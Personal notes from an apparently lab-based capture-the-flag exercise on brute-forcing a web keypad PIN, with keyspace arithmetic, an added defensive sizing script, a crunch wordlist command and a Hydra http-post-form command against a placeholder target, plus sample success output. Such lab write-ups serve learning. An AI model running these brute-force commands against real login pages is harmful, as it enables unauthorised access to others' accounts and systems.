03 Dec 2023
Brute-forcing Hydra is Coming to Town
Counting PIN codes - each position can hold 0-9, so there are 10^x possibilities, where x = number of digits. Four digits, 10^4 = 10,000 possibilities.
Counting passwords - count how many characters are allowed in each position; a four-character password using 0-9a-zA-Z has 10+26+26 = 62 characters in each of four places, 62^4 = 14,776,336 possibilities. Symbols add another 30 characters, 92^4 = 71,639,296.
If trying a password takes 0.001 seconds, it would take up to 4 hours to try all 14 million combinations. On average the password is found about halfway through the list, so it is safe to assume it would take around 2 hours to crack the password. Increase the time taken by adding complexity: include symbols and add to the length.
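The arithmetic above as a small sizing script, useful for checking a PIN or password policy from the defender's side. This is an added example, not part of the original notes; the lockout model (a pause after every N attempts) and the function names are assumptions made for illustration, and it goes slightly beyond the text by solving for the minimum length needed to reach a target search time.

```python
def keyspace(alphabet_size, length):
    """Number of candidates of exactly `length` characters."""
    return alphabet_size ** length


def search_seconds(candidates, secs_per_guess, max_guesses=None, lockout_secs=0.0):
    """Return (worst_case, average) seconds to search `candidates` values.

    Assumed lockout model: after every `max_guesses` attempts the service
    refuses further attempts for `lockout_secs`. The average case is taken
    as half the keyspace, as in the text.
    """
    def elapsed(guesses):
        pauses = (guesses - 1) // max_guesses if max_guesses else 0
        return guesses * secs_per_guess + pauses * lockout_secs

    return elapsed(candidates), elapsed(candidates // 2)


def min_length(alphabet_size, secs_per_guess, target_avg_secs):
    """Shortest length whose average search time reaches the target."""
    length = 1
    while keyspace(alphabet_size, length) // 2 * secs_per_guess < target_avg_secs:
        length += 1
    return length


if __name__ == "__main__":
    rate = 0.001  # seconds per guess, the figure used in the text
    cases = [("4-digit PIN", 10, 4), ("4 chars, 0-9a-zA-Z", 62, 4),
             ("4 chars, with symbols", 92, 4)]
    for label, alphabet, length in cases:
        n = keyspace(alphabet, length)
        worst, avg = search_seconds(n, rate)
        print(f"{label:22} {n:>12,} candidates  "
              f"worst {worst / 3600:6.2f} h  average {avg / 3600:6.2f} h")

    # Same 4-digit PIN, but with a 5-attempt / 300-second lockout (assumed policy).
    worst, avg = search_seconds(keyspace(10, 4), rate, max_guesses=5, lockout_secs=300)
    print(f"4-digit PIN with lockout: worst {worst / 86400:.2f} days, "
          f"average {avg / 86400:.2f} days")

    year = 365 * 24 * 3600
    print("Length for a 1-year average search, 62 chars:", min_length(62, rate, year))
    print("Length for a 1-year average search, 92 chars:", min_length(92, rate, year))
```

The lockout case shows why attempt throttling matters more than alphabet size for short codes: the keyspace is unchanged, but the time to cover it is dominated by the enforced pauses.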
First determine how long the password is. In this case, 3 characters. Then figure out what characters are included. In this case, the keypad has hex characters, 0-F. The Crunch tool can be used in a terminal to generate the options.
crunch 3 3 0123456789ABCDEF -o 3digits.txt
-o filename.txt - saves the output to the specified file.
Can try out codes manually or with a tool like Hydra. In this case, view the source of the page to see which method it uses to log in, what address/file is used, and the name of the variable submitted as the code. This info is needed to set the arguments in Hydra.
hydra -l '' -P filename.txt -f -v TARGET_ADDRESS http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
-l '' - indicates login name is blank since it is only a password
-P filename.txt - specifies password file to use
-f - stops Hydra when password is found
-v - verbose output (as usual)
http-post-form - specifies method to use
/login.php - page where pin is entered
pin=^PASS^ - replaces ^PASS^ with values from file
Access denied - wrong guesses give access denied page
-s 8000 - port number on target
Failure then success looks similar to:
[VERBOSE] Page redirected to http[s]://MACHINE_IP:8000/error.php
[...]
[VERBOSE] Page redirected to http[s]://MACHINE_IP:8000/error.php
[8000][http-post-form] host: MACHINE_IP password: [redacted]
[STATUS] attack finished for MACHINE_IP (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-19 17:39:24
Brute force the code to unlock the door.
Door unlocked, flag retrieved, fun had.
Password Attacks - need to try and remember it.